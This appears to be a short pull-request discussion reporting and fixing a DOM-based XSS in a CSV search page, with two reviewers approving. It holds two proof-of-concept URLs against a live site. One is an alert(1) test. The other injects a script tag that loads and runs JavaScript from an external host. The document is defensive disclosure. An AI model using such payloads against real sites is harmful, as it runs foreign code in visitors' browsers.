fixing DOM XSS

[dxa4481]

There's a DOM based XSS as demonstrated here

http://devprogress.us/csv-simple-search/?externalFileUrl=javascript:alert(1)

and here

http://devprogress.us/csv-simple-search/?externalFileUrl=javascript:(function()%7Bjavascript:var%20s%3Ddocument.createElement(%27script%27)%3Bs.setAttribute(%27src%27,%27https://nthitz.github.io/turndownforwhatjs/tdfw.js%27)%3Bdocument.body.appendChild(s)%3B%7D)()%3B

There's two ways to fix this issue, one is validate the URLs, the other is to just remove the hyperlink. For a quick fix I removed the hyperlink

[samuelcole]

👍

[decause]

:+1: ship plz :ship: